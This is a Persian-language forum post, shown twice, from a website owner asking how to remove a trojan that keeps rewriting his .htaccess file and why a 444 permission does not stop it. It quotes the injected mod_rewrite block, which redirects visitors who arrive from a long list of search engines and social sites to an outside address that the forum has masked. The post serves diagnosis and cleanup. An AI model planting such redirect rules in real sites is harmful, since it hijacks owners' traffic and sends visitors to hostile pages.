hamidsajjadieh
05-03-2012, 12:30 PM
با سلام
بنده چند ماهی هست که یه سایت راه اندازی کردم
وقتی توی گوگل یا یاهو و ... یکی از صفحات سایتو سرچ میکنم آدرسو میاره ولی وقتی روش کلیک میکنم به این آدرس دایرکت میشه :
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
البته آگه آدرسو دستی بزنم سایت باز میشه ولی تو موتورهای جستجو به اون آدرسی که نوشتم میره
یکم تحقیق کردم و فهمیدم که تو هاست من یه تروجان قرار گرفته به نام
BLACKLISTED:35
این اطلاعاتو از سایت معتبر <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> (<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>) گرفتم
خود این سایت هاست منو اسکن کرد و بهم گفت که این تروجان روشه
کار این تروجان به این صورته که میاد و فایل .htaccess را دستکاری میکنه و این قسمتو بهش اضافه میکنه
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveint ernet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|d moz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquic k|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch| pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> [R=301,L]
RewriteCond %{<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> [R=301,L]
</IfModule>
این کار باعث میشه که موتورهای جستجو سایت منو به آدرس <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> ریدایرکت کنند
حتی اگه باز من این فایلو تصحیح کنم بعد از حدود 20 دقیقه دوباره این قسمت به فایل اضافه میشه
سوالم اینه که :
1- با وجودی که کن پرمیشن این فایلو روی 444 تنظیم کردم چطور میتونه اونو تغییر بده؟
2- چطوری میشه این تروجانو حذف کنم؟
از بزرگان و اساتید محترم میخوام که جوابگو باشند
خیلی خیلی متشکرم
بنده چند ماهی هست که یه سایت راه اندازی کردم
وقتی توی گوگل یا یاهو و ... یکی از صفحات سایتو سرچ میکنم آدرسو میاره ولی وقتی روش کلیک میکنم به این آدرس دایرکت میشه :
<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>
البته آگه آدرسو دستی بزنم سایت باز میشه ولی تو موتورهای جستجو به اون آدرسی که نوشتم میره
یکم تحقیق کردم و فهمیدم که تو هاست من یه تروجان قرار گرفته به نام
BLACKLISTED:35
این اطلاعاتو از سایت معتبر <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> (<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>) گرفتم
خود این سایت هاست منو اسکن کرد و بهم گفت که این تروجان روشه
کار این تروجان به این صورته که میاد و فایل .htaccess را دستکاری میکنه و این قسمتو بهش اضافه میکنه
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveint ernet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|d moz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquic k|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch| pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> [R=301,L]
RewriteCond %{<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> [R=301,L]
</IfModule>
این کار باعث میشه که موتورهای جستجو سایت منو به آدرس <b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> ریدایرکت کنند
حتی اگه باز من این فایلو تصحیح کنم بعد از حدود 20 دقیقه دوباره این قسمت به فایل اضافه میشه
سوالم اینه که :
1- با وجودی که کن پرمیشن این فایلو روی 444 تنظیم کردم چطور میتونه اونو تغییر بده؟
2- چطوری میشه این تروجانو حذف کنم؟
از بزرگان و اساتید محترم میخوام که جوابگو باشند
خیلی خیلی متشکرم